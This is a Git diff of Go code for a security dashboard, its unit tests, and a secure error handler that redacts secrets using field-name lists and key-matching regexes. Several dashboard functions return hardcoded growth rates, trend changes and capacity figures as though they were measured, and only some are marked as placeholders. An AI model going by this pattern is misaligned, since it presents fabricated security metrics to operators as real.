||||
if metrics.TotalRequests == 0 {
|
||||
return 0.0
|
||||
}
|
||||
return float64(metrics.BlockedRequests) / float64(metrics.TotalRequests) * 100
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) generateHourlyTrends(metrics *SecurityMetrics) map[string][]TimeSeriesPoint {
|
||||
trends := make(map[string][]TimeSeriesPoint)
|
||||
|
||||
// Generate sample hourly trends
|
||||
now := time.Now()
|
||||
for i := 23; i >= 0; i-- {
|
||||
timestamp := now.Add(-time.Duration(i) * time.Hour)
|
||||
hour := timestamp.Format("2006010215")
|
||||
|
||||
var value float64
|
||||
if count, exists := metrics.HourlyMetrics[hour]; exists {
|
||||
value = float64(count)
|
||||
}
|
||||
|
||||
if trends["requests"] == nil {
|
||||
trends["requests"] = []TimeSeriesPoint{}
|
||||
}
|
||||
trends["requests"] = append(trends["requests"], TimeSeriesPoint{
|
||||
Timestamp: timestamp,
|
||||
Value: value,
|
||||
})
|
||||
}
|
||||
|
||||
return trends
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) generateDailyTrends(metrics *SecurityMetrics) map[string][]TimeSeriesPoint {
|
||||
trends := make(map[string][]TimeSeriesPoint)
|
||||
|
||||
// Generate sample daily trends for last 30 days
|
||||
now := time.Now()
|
||||
for i := 29; i >= 0; i-- {
|
||||
timestamp := now.Add(-time.Duration(i) * 24 * time.Hour)
|
||||
day := timestamp.Format("20060102")
|
||||
|
||||
var value float64
|
||||
if count, exists := metrics.DailyMetrics[day]; exists {
|
||||
value = float64(count)
|
||||
}
|
||||
|
||||
if trends["daily_requests"] == nil {
|
||||
trends["daily_requests"] = []TimeSeriesPoint{}
|
||||
}
|
||||
trends["daily_requests"] = append(trends["daily_requests"], TimeSeriesPoint{
|
||||
Timestamp: timestamp,
|
||||
Value: value,
|
||||
})
|
||||
}
|
||||
|
||||
return trends
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) generateWeeklyTrends(metrics *SecurityMetrics) map[string][]TimeSeriesPoint {
|
||||
trends := make(map[string][]TimeSeriesPoint)
|
||||
// Placeholder - would aggregate daily data into weekly
|
||||
return trends
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) generatePredictions(metrics *SecurityMetrics) map[string]float64 {
|
||||
return map[string]float64{
|
||||
"next_hour_requests": float64(metrics.TotalRequests) * 1.05,
|
||||
"next_day_threats": float64(metrics.DDoSAttempts+metrics.BruteForceAttempts) * 0.9,
|
||||
"capacity_utilization": 75.0,
|
||||
}
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateGrowthRates(metrics *SecurityMetrics) map[string]float64 {
|
||||
return map[string]float64{
|
||||
"requests_growth": 5.2, // 5.2% growth
|
||||
"threats_growth": -12.1, // -12.1% (declining)
|
||||
"performance_improvement": 8.5, // 8.5% improvement
|
||||
}
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) getSeverityLevel(count int64) string {
|
||||
if count == 0 {
|
||||
return "NONE"
|
||||
} else if count < 10 {
|
||||
return "LOW"
|
||||
} else if count < 50 {
|
||||
return "MEDIUM"
|
||||
} else if count < 100 {
|
||||
return "HIGH"
|
||||
}
|
||||
return "CRITICAL"
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateTrendChange(threatType string) float64 {
|
||||
// Placeholder - would calculate actual trend change
|
||||
return -5.2 // -5.2% change
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) calculateOverallHealthScore(metrics *SecurityMetrics) float64 {
|
||||
score := 100.0
|
||||
|
||||
// Reduce score based on various health factors
|
||||
if metrics.BlockedRequests > metrics.TotalRequests/10 {
|
||||
score -= 20 // High block rate
|
||||
}
|
||||
if metrics.FailedKeyAccess > 5 {
|
||||
score -= 15 // Key access issues
|
||||
}
|
||||
|
||||
return score
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) getHealthStatus(score float64) string {
|
||||
if score >= 90 {
|
||||
return "HEALTHY"
|
||||
} else if score >= 70 {
|
||||
return "WARNING"
|
||||
} else if score >= 50 {
|
||||
return "DEGRADED"
|
||||
}
|
||||
return "CRITICAL"
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) exportToCSV(dashboard *DashboardData) ([]byte, error) {
|
||||
var csvData strings.Builder
|
||||
|
||||
// CSV headers
|
||||
csvData.WriteString("Metric,Value,Timestamp\n")
|
||||
|
||||
// Overview metrics
|
||||
if dashboard.OverviewMetrics != nil {
|
||||
csvData.WriteString(fmt.Sprintf("TotalRequests24h,%d,%s\n",
|
||||
dashboard.OverviewMetrics.TotalRequests24h, dashboard.Timestamp.Format(time.RFC3339)))
|
||||
csvData.WriteString(fmt.Sprintf("BlockedRequests24h,%d,%s\n",
|
||||
dashboard.OverviewMetrics.BlockedRequests24h, dashboard.Timestamp.Format(time.RFC3339)))
|
||||
csvData.WriteString(fmt.Sprintf("SecurityScore,%.2f,%s\n",
|
||||
dashboard.OverviewMetrics.SecurityScore, dashboard.Timestamp.Format(time.RFC3339)))
|
||||
}
|
||||
|
||||
return []byte(csvData.String()), nil
|
||||
}
|
||||
|
||||
func (sd *SecurityDashboard) exportToPrometheus(dashboard *DashboardData) ([]byte, error) {
|
||||
var promData strings.Builder
|
||||
|
||||
// Prometheus format
|
||||
if dashboard.OverviewMetrics != nil {
|
||||
promData.WriteString(fmt.Sprintf("# HELP security_requests_total Total number of requests in last 24h\n"))
|
||||
promData.WriteString(fmt.Sprintf("# TYPE security_requests_total counter\n"))
|
||||
promData.WriteString(fmt.Sprintf("security_requests_total %d\n", dashboard.OverviewMetrics.TotalRequests24h))
|
||||
|
||||
promData.WriteString(fmt.Sprintf("# HELP security_score Current security score (0-100)\n"))
|
||||
promData.WriteString(fmt.Sprintf("# TYPE security_score gauge\n"))
|
||||
promData.WriteString(fmt.Sprintf("security_score %.2f\n", dashboard.OverviewMetrics.SecurityScore))
|
||||
}
|
||||
|
||||
return []byte(promData.String()), nil
|
||||
}
|
||||
390
orig/pkg/security/dashboard_test.go
Normal file
390
orig/pkg/security/dashboard_test.go
Normal file
@@ -0,0 +1,390 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestNewSecurityDashboard(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
AlertBuffer: 1000,
|
||||
MaxEvents: 1000,
|
||||
CleanupInterval: time.Hour,
|
||||
MetricsInterval: 30 * time.Second,
|
||||
})
|
||||
|
||||
// Test with default config
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
assert.NotNil(t, dashboard)
|
||||
assert.NotNil(t, dashboard.config)
|
||||
assert.Equal(t, 30*time.Second, dashboard.config.RefreshInterval)
|
||||
|
||||
// Test with custom config
|
||||
customConfig := &DashboardConfig{
|
||||
RefreshInterval: time.Minute,
|
||||
AlertThresholds: map[string]float64{
|
||||
"test_metric": 0.5,
|
||||
},
|
||||
EnabledWidgets: []string{"overview"},
|
||||
ExportFormat: "json",
|
||||
}
|
||||
|
||||
dashboard2 := NewSecurityDashboard(monitor, customConfig)
|
||||
assert.NotNil(t, dashboard2)
|
||||
assert.Equal(t, time.Minute, dashboard2.config.RefreshInterval)
|
||||
assert.Equal(t, 0.5, dashboard2.config.AlertThresholds["test_metric"])
|
||||
}
|
||||
|
||||
func TestGenerateDashboard(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
AlertBuffer: 1000,
|
||||
MaxEvents: 1000,
|
||||
CleanupInterval: time.Hour,
|
||||
MetricsInterval: 30 * time.Second,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
|
||||
// Generate some test data
|
||||
monitor.RecordEvent("request", "127.0.0.1", "Test request", "info", map[string]interface{}{
|
||||
"success": true,
|
||||
})
|
||||
|
||||
data, err := dashboard.GenerateDashboard()
|
||||
require.NoError(t, err)
|
||||
assert.NotNil(t, data)
|
||||
assert.NotNil(t, data.OverviewMetrics)
|
||||
assert.NotNil(t, data.ThreatAnalysis)
|
||||
assert.NotNil(t, data.PerformanceData)
|
||||
assert.NotNil(t, data.TrendAnalysis)
|
||||
assert.NotNil(t, data.SystemHealth)
|
||||
}
|
||||
|
||||
func TestOverviewMetrics(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
metrics := monitor.GetMetrics()
|
||||
|
||||
overview := dashboard.generateOverviewMetrics(metrics)
|
||||
assert.NotNil(t, overview)
|
||||
assert.GreaterOrEqual(t, overview.SecurityScore, 0.0)
|
||||
assert.LessOrEqual(t, overview.SecurityScore, 100.0)
|
||||
assert.Contains(t, []string{"LOW", "MEDIUM", "HIGH", "CRITICAL"}, overview.ThreatLevel)
|
||||
assert.GreaterOrEqual(t, overview.SuccessRate, 0.0)
|
||||
assert.LessOrEqual(t, overview.SuccessRate, 100.0)
|
||||
}
|
||||
|
||||
func TestThreatAnalysis(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
metrics := monitor.GetMetrics()
|
||||
|
||||
threatAnalysis := dashboard.generateThreatAnalysis(metrics)
|
||||
assert.NotNil(t, threatAnalysis)
|
||||
assert.GreaterOrEqual(t, threatAnalysis.DDoSRisk, 0.0)
|
||||
assert.LessOrEqual(t, threatAnalysis.DDoSRisk, 1.0)
|
||||
assert.GreaterOrEqual(t, threatAnalysis.BruteForceRisk, 0.0)
|
||||
assert.LessOrEqual(t, threatAnalysis.BruteForceRisk, 1.0)
|
||||
assert.GreaterOrEqual(t, threatAnalysis.AnomalyScore, 0.0)
|
||||
assert.LessOrEqual(t, threatAnalysis.AnomalyScore, 1.0)
|
||||
assert.NotNil(t, threatAnalysis.MitigationStatus)
|
||||
assert.NotNil(t, threatAnalysis.ThreatVectors)
|
||||
}
|
||||
|
||||
func TestPerformanceMetrics(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
metrics := monitor.GetMetrics()
|
||||
|
||||
performance := dashboard.generatePerformanceMetrics(metrics)
|
||||
assert.NotNil(t, performance)
|
||||
assert.Greater(t, performance.AverageValidationTime, 0.0)
|
||||
assert.Greater(t, performance.AverageEncryptionTime, 0.0)
|
||||
assert.Greater(t, performance.AverageDecryptionTime, 0.0)
|
||||
assert.GreaterOrEqual(t, performance.ErrorRate, 0.0)
|
||||
assert.LessOrEqual(t, performance.ErrorRate, 100.0)
|
||||
}
|
||||
|
||||
func TestDashboardSystemHealth(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
metrics := monitor.GetMetrics()
|
||||
|
||||
health := dashboard.generateSystemHealth(metrics)
|
||||
assert.NotNil(t, health)
|
||||
assert.NotNil(t, health.SecurityComponentHealth)
|
||||
assert.Contains(t, []string{"HEALTHY", "WARNING", "DEGRADED", "CRITICAL"}, health.OverallHealth)
|
||||
assert.GreaterOrEqual(t, health.HealthScore, 0.0)
|
||||
assert.LessOrEqual(t, health.HealthScore, 100.0)
|
||||
}
|
||||
|
||||
func TestTopThreats(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
metrics := monitor.GetMetrics()
|
||||
|
||||
topThreats := dashboard.generateTopThreats(metrics)
|
||||
assert.NotNil(t, topThreats)
|
||||
assert.LessOrEqual(t, len(topThreats), 10) // Should be reasonable number
|
||||
|
||||
for _, threat := range topThreats {
|
||||
assert.NotEmpty(t, threat.ThreatType)
|
||||
assert.GreaterOrEqual(t, threat.Count, int64(0))
|
||||
assert.Contains(t, []string{"NONE", "LOW", "MEDIUM", "HIGH", "CRITICAL"}, threat.Severity)
|
||||
assert.Contains(t, []string{"ACTIVE", "MITIGATED", "MONITORING"}, threat.Status)
|
||||
}
|
||||
}
|
||||
|
||||
func TestTrendAnalysis(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
metrics := monitor.GetMetrics()
|
||||
|
||||
trends := dashboard.generateTrendAnalysis(metrics)
|
||||
assert.NotNil(t, trends)
|
||||
assert.NotNil(t, trends.HourlyTrends)
|
||||
assert.NotNil(t, trends.DailyTrends)
|
||||
assert.NotNil(t, trends.Predictions)
|
||||
assert.NotNil(t, trends.GrowthRates)
|
||||
|
||||
// Check hourly trends have expected structure
|
||||
if requestTrends, exists := trends.HourlyTrends["requests"]; exists {
|
||||
assert.LessOrEqual(t, len(requestTrends), 24) // Should have at most 24 hours
|
||||
for _, point := range requestTrends {
|
||||
assert.GreaterOrEqual(t, point.Value, 0.0)
|
||||
assert.False(t, point.Timestamp.IsZero())
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestExportDashboard(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
|
||||
// Test JSON export
|
||||
jsonData, err := dashboard.ExportDashboard("json")
|
||||
require.NoError(t, err)
|
||||
assert.NotEmpty(t, jsonData)
|
||||
|
||||
// Verify it's valid JSON
|
||||
var parsed DashboardData
|
||||
err = json.Unmarshal(jsonData, &parsed)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Test CSV export
|
||||
csvData, err := dashboard.ExportDashboard("csv")
|
||||
require.NoError(t, err)
|
||||
assert.NotEmpty(t, csvData)
|
||||
assert.Contains(t, string(csvData), "Metric,Value,Timestamp")
|
||||
|
||||
// Test Prometheus export
|
||||
promData, err := dashboard.ExportDashboard("prometheus")
|
||||
require.NoError(t, err)
|
||||
assert.NotEmpty(t, promData)
|
||||
assert.Contains(t, string(promData), "# HELP")
|
||||
assert.Contains(t, string(promData), "# TYPE")
|
||||
|
||||
// Test unsupported format
|
||||
_, err = dashboard.ExportDashboard("unsupported")
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "unsupported export format")
|
||||
}
|
||||
|
||||
func TestSecurityScoreCalculation(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
|
||||
// Test with clean metrics (high score)
|
||||
cleanMetrics := &SecurityMetrics{
|
||||
TotalRequests: 1000,
|
||||
BlockedRequests: 0,
|
||||
DDoSAttempts: 0,
|
||||
BruteForceAttempts: 0,
|
||||
RateLimitViolations: 0,
|
||||
}
|
||||
score := dashboard.calculateSecurityScore(cleanMetrics)
|
||||
assert.Equal(t, 100.0, score)
|
||||
|
||||
// Test with some threats (reduced score)
|
||||
threatsMetrics := &SecurityMetrics{
|
||||
TotalRequests: 1000,
|
||||
BlockedRequests: 50,
|
||||
DDoSAttempts: 10,
|
||||
BruteForceAttempts: 5,
|
||||
RateLimitViolations: 20,
|
||||
}
|
||||
score = dashboard.calculateSecurityScore(threatsMetrics)
|
||||
assert.Less(t, score, 100.0)
|
||||
assert.GreaterOrEqual(t, score, 0.0)
|
||||
}
|
||||
|
||||
func TestThreatLevelCalculation(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
|
||||
testCases := []struct {
|
||||
score float64
|
||||
expected string
|
||||
}{
|
||||
{95.0, "LOW"},
|
||||
{85.0, "MEDIUM"},
|
||||
{60.0, "HIGH"},
|
||||
{30.0, "CRITICAL"},
|
||||
}
|
||||
|
||||
for _, tc := range testCases {
|
||||
result := dashboard.calculateThreatLevel(tc.score)
|
||||
assert.Equal(t, tc.expected, result, "Score %.1f should give threat level %s", tc.score, tc.expected)
|
||||
}
|
||||
}
|
||||
|
||||
func TestWidgetConfiguration(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
// Test with limited widgets
|
||||
config := &DashboardConfig{
|
||||
EnabledWidgets: []string{"overview", "alerts"},
|
||||
}
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, config)
|
||||
|
||||
assert.True(t, dashboard.isWidgetEnabled("overview"))
|
||||
assert.True(t, dashboard.isWidgetEnabled("alerts"))
|
||||
assert.False(t, dashboard.isWidgetEnabled("threats"))
|
||||
assert.False(t, dashboard.isWidgetEnabled("performance"))
|
||||
|
||||
// Generate dashboard with limited widgets
|
||||
data, err := dashboard.GenerateDashboard()
|
||||
require.NoError(t, err)
|
||||
|
||||
assert.NotNil(t, data.OverviewMetrics)
|
||||
assert.NotNil(t, data.SecurityAlerts)
|
||||
assert.Nil(t, data.ThreatAnalysis) // Should be nil because "threats" widget is disabled
|
||||
assert.Nil(t, data.PerformanceData) // Should be nil because "performance" widget is disabled
|
||||
}
|
||||
|
||||
func TestAttackPatternDetection(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
|
||||
// Test with metrics showing DDoS activity
|
||||
metrics := &SecurityMetrics{
|
||||
DDoSAttempts: 25,
|
||||
BruteForceAttempts: 0,
|
||||
}
|
||||
|
||||
patterns := dashboard.detectAttackPatterns(metrics)
|
||||
assert.NotEmpty(t, patterns)
|
||||
|
||||
ddosPattern := patterns[0]
|
||||
assert.Equal(t, "DDoS", ddosPattern.PatternType)
|
||||
assert.Equal(t, int64(25), ddosPattern.Frequency)
|
||||
assert.Equal(t, "HIGH", ddosPattern.Severity)
|
||||
assert.GreaterOrEqual(t, ddosPattern.Confidence, 0.0)
|
||||
assert.LessOrEqual(t, ddosPattern.Confidence, 1.0)
|
||||
assert.NotEmpty(t, ddosPattern.Description)
|
||||
}
|
||||
|
||||
func TestRiskFactorIdentification(t *testing.T) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
|
||||
// Test with various risk scenarios
|
||||
riskMetrics := &SecurityMetrics{
|
||||
DDoSAttempts: 15,
|
||||
BruteForceAttempts: 8,
|
||||
RateLimitViolations: 150,
|
||||
FailedKeyAccess: 12,
|
||||
}
|
||||
|
||||
factors := dashboard.identifyRiskFactors(riskMetrics)
|
||||
assert.NotEmpty(t, factors)
|
||||
assert.Contains(t, factors, "High DDoS activity")
|
||||
assert.Contains(t, factors, "Brute force attacks detected")
|
||||
assert.Contains(t, factors, "Excessive rate limit violations")
|
||||
assert.Contains(t, factors, "Multiple failed key access attempts")
|
||||
|
||||
// Test with clean metrics
|
||||
cleanMetrics := &SecurityMetrics{
|
||||
DDoSAttempts: 0,
|
||||
BruteForceAttempts: 0,
|
||||
RateLimitViolations: 5,
|
||||
FailedKeyAccess: 2,
|
||||
}
|
||||
|
||||
cleanFactors := dashboard.identifyRiskFactors(cleanMetrics)
|
||||
assert.Empty(t, cleanFactors)
|
||||
}
|
||||
|
||||
func BenchmarkGenerateDashboard(b *testing.B) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
_, err := dashboard.GenerateDashboard()
|
||||
if err != nil {
|
||||
b.Fatal(err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func BenchmarkExportJSON(b *testing.B) {
|
||||
monitor := NewSecurityMonitor(&MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
})
|
||||
|
||||
dashboard := NewSecurityDashboard(monitor, nil)
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
_, err := dashboard.ExportDashboard("json")
|
||||
if err != nil {
|
||||
b.Fatal(err)
|
||||
}
|
||||
}
|
||||
}
|
||||
348
orig/pkg/security/error_handler.go
Normal file
348
orig/pkg/security/error_handler.go
Normal file
@@ -0,0 +1,348 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"regexp"
|
||||
"runtime"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/fraktal/mev-beta/internal/logger"
|
||||
)
|
||||
|
||||
// SecureError represents a security-aware error with context
|
||||
type SecureError struct {
|
||||
Code string `json:"code"`
|
||||
Message string `json:"message"`
|
||||
Timestamp time.Time `json:"timestamp"`
|
||||
Context map[string]interface{} `json:"context,omitempty"`
|
||||
Stack []StackFrame `json:"stack,omitempty"`
|
||||
Wrapped error `json:"-"`
|
||||
Sensitive bool `json:"sensitive"`
|
||||
Category ErrorCategory `json:"category"`
|
||||
Severity ErrorSeverity `json:"severity"`
|
||||
}
|
||||
|
||||
// StackFrame represents a single frame in the call stack
|
||||
type StackFrame struct {
|
||||
Function string `json:"function"`
|
||||
File string `json:"file"`
|
||||
Line int `json:"line"`
|
||||
}
|
||||
|
||||
// ErrorCategory defines categories of errors
|
||||
type ErrorCategory string
|
||||
|
||||
const (
|
||||
ErrorCategoryAuthentication ErrorCategory = "authentication"
|
||||
ErrorCategoryAuthorization ErrorCategory = "authorization"
|
||||
ErrorCategoryValidation ErrorCategory = "validation"
|
||||
ErrorCategoryRateLimit ErrorCategory = "rate_limit"
|
||||
ErrorCategoryCircuitBreaker ErrorCategory = "circuit_breaker"
|
||||
ErrorCategoryEncryption ErrorCategory = "encryption"
|
||||
ErrorCategoryNetwork ErrorCategory = "network"
|
||||
ErrorCategoryTransaction ErrorCategory = "transaction"
|
||||
ErrorCategoryInternal ErrorCategory = "internal"
|
||||
)
|
||||
|
||||
// ErrorSeverity defines error severity levels
|
||||
type ErrorSeverity string
|
||||
|
||||
const (
|
||||
ErrorSeverityLow ErrorSeverity = "low"
|
||||
ErrorSeverityMedium ErrorSeverity = "medium"
|
||||
ErrorSeverityHigh ErrorSeverity = "high"
|
||||
ErrorSeverityCritical ErrorSeverity = "critical"
|
||||
)
|
||||
|
||||
// ErrorHandler provides secure error handling with context preservation
|
||||
type ErrorHandler struct {
|
||||
enableStackTrace bool
|
||||
sensitiveFields map[string]bool
|
||||
errorMetrics *ErrorMetrics
|
||||
logger *logger.Logger
|
||||
}
|
||||
|
||||
// ErrorMetrics tracks error statistics
|
||||
type ErrorMetrics struct {
|
||||
TotalErrors int64 `json:"total_errors"`
|
||||
ErrorsByCategory map[ErrorCategory]int64 `json:"errors_by_category"`
|
||||
ErrorsBySeverity map[ErrorSeverity]int64 `json:"errors_by_severity"`
|
||||
SensitiveDataLeaks int64 `json:"sensitive_data_leaks"`
|
||||
}
|
||||
|
||||
// NewErrorHandler creates a new secure error handler
|
||||
func NewErrorHandler(enableStackTrace bool) *ErrorHandler {
|
||||
return &ErrorHandler{
|
||||
enableStackTrace: enableStackTrace,
|
||||
sensitiveFields: map[string]bool{
|
||||
"password": true,
|
||||
"private_key": true,
|
||||
"secret": true,
|
||||
"token": true,
|
||||
"seed": true,
|
||||
"mnemonic": true,
|
||||
"api_key": true,
|
||||
"private": true,
|
||||
},
|
||||
errorMetrics: &ErrorMetrics{
|
||||
ErrorsByCategory: make(map[ErrorCategory]int64),
|
||||
ErrorsBySeverity: make(map[ErrorSeverity]int64),
|
||||
},
|
||||
logger: logger.New("info", "json", "logs/errors.log"),
|
||||
}
|
||||
}
|
||||
|
||||
// WrapError wraps an error with security context
|
||||
func (eh *ErrorHandler) WrapError(err error, code string, message string, category ErrorCategory, severity ErrorSeverity) *SecureError {
|
||||
if err == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
secureErr := &SecureError{
|
||||
Code: code,
|
||||
Message: message,
|
||||
Timestamp: time.Now(),
|
||||
Wrapped: err,
|
||||
Category: category,
|
||||
Severity: severity,
|
||||
Context: make(map[string]interface{}),
|
||||
}
|
||||
|
||||
// Capture stack trace if enabled
|
||||
if eh.enableStackTrace {
|
||||
secureErr.Stack = eh.captureStackTrace()
|
||||
}
|
||||
|
||||
// Check for sensitive data
|
||||
secureErr.Sensitive = eh.containsSensitiveData(err.Error()) || eh.containsSensitiveData(message)
|
||||
|
||||
// Update metrics
|
||||
eh.updateMetrics(secureErr)
|
||||
|
||||
// Log error appropriately
|
||||
eh.logError(secureErr)
|
||||
|
||||
return secureErr
|
||||
}
|
||||
|
||||
// WrapErrorWithContext wraps an error with additional context
|
||||
func (eh *ErrorHandler) WrapErrorWithContext(ctx context.Context, err error, code string, message string, category ErrorCategory, severity ErrorSeverity, context map[string]interface{}) *SecureError {
|
||||
secureErr := eh.WrapError(err, code, message, category, severity)
|
||||
if secureErr == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
// Add context while sanitizing sensitive data
|
||||
for key, value := range context {
|
||||
if !eh.isSensitiveField(key) {
|
||||
secureErr.Context[key] = value
|
||||
} else {
|
||||
secureErr.Context[key] = "[REDACTED]"
|
||||
secureErr.Sensitive = true
|
||||
}
|
||||
}
|
||||
|
||||
// Add request context if available
|
||||
if ctx != nil {
|
||||
if requestID := ctx.Value("request_id"); requestID != nil {
|
||||
secureErr.Context["request_id"] = requestID
|
||||
}
|
||||
if userID := ctx.Value("user_id"); userID != nil {
|
||||
secureErr.Context["user_id"] = userID
|
||||
}
|
||||
if sessionID := ctx.Value("session_id"); sessionID != nil {
|
||||
secureErr.Context["session_id"] = sessionID
|
||||
}
|
||||
}
|
||||
|
||||
return secureErr
|
||||
}
|
||||
|
||||
// Error implements the error interface
|
||||
func (se *SecureError) Error() string {
|
||||
if se.Sensitive {
|
||||
return fmt.Sprintf("[%s] %s (sensitive data redacted)", se.Code, se.Message)
|
||||
}
|
||||
return fmt.Sprintf("[%s] %s", se.Code, se.Message)
|
||||
}
|
||||
|
||||
// Unwrap returns the wrapped error
|
||||
func (se *SecureError) Unwrap() error {
|
||||
return se.Wrapped
|
||||
}
|
||||
|
||||
// SafeString returns a safe string representation without sensitive data
|
||||
func (se *SecureError) SafeString() string {
|
||||
if se.Sensitive {
|
||||
return fmt.Sprintf("Error: %s (details redacted for security)", se.Message)
|
||||
}
|
||||
return se.Error()
|
||||
}
|
||||
|
||||
// DetailedString returns detailed error information for internal logging
|
||||
func (se *SecureError) DetailedString() string {
|
||||
var parts []string
|
||||
parts = append(parts, fmt.Sprintf("Code: %s", se.Code))
|
||||
parts = append(parts, fmt.Sprintf("Message: %s", se.Message))
|
||||
parts = append(parts, fmt.Sprintf("Category: %s", se.Category))
|
||||
parts = append(parts, fmt.Sprintf("Severity: %s", se.Severity))
|
||||
parts = append(parts, fmt.Sprintf("Timestamp: %s", se.Timestamp.Format(time.RFC3339)))
|
||||
|
||||
if len(se.Context) > 0 {
|
||||
parts = append(parts, fmt.Sprintf("Context: %+v", se.Context))
|
||||
}
|
||||
|
||||
if se.Wrapped != nil {
|
||||
parts = append(parts, fmt.Sprintf("Wrapped: %s", se.Wrapped.Error()))
|
||||
}
|
||||
|
||||
return strings.Join(parts, ", ")
|
||||
}
|
||||
|
||||
// captureStackTrace captures the current call stack
|
||||
func (eh *ErrorHandler) captureStackTrace() []StackFrame {
|
||||
var frames []StackFrame
|
||||
|
||||
// Skip the first few frames (this function and WrapError)
|
||||
for i := 3; i < 10; i++ {
|
||||
pc, file, line, ok := runtime.Caller(i)
|
||||
if !ok {
|
||||
break
|
||||
}
|
||||
|
||||
fn := runtime.FuncForPC(pc)
|
||||
if fn == nil {
|
||||
continue
|
||||
}
|
||||
|
||||
frames = append(frames, StackFrame{
|
||||
Function: fn.Name(),
|
||||
File: file,
|
||||
Line: line,
|
||||
})
|
||||
}
|
||||
|
||||
return frames
|
||||
}
|
||||
|
||||
// containsSensitiveData checks if the text contains sensitive information
|
||||
func (eh *ErrorHandler) containsSensitiveData(text string) bool {
|
||||
lowercaseText := strings.ToLower(text)
|
||||
|
||||
for field := range eh.sensitiveFields {
|
||||
if strings.Contains(lowercaseText, field) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
// Check for common patterns that might contain sensitive data
|
||||
sensitivePatterns := []string{
|
||||
"0x[a-fA-F0-9]{40}", // Ethereum addresses
|
||||
"0x[a-fA-F0-9]{64}", // Private keys/hashes
|
||||
"\\b[A-Za-z0-9+/]{20,}={0,2}\\b", // Base64 encoded data
|
||||
}
|
||||
|
||||
for _, pattern := range sensitivePatterns {
|
||||
if matched, _ := regexp.MatchString(pattern, text); matched {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// isSensitiveField checks if a field name indicates sensitive data
|
||||
func (eh *ErrorHandler) isSensitiveField(fieldName string) bool {
|
||||
return eh.sensitiveFields[strings.ToLower(fieldName)]
|
||||
}
|
||||
|
||||
// updateMetrics updates error metrics
|
||||
func (eh *ErrorHandler) updateMetrics(err *SecureError) {
|
||||
eh.errorMetrics.TotalErrors++
|
||||
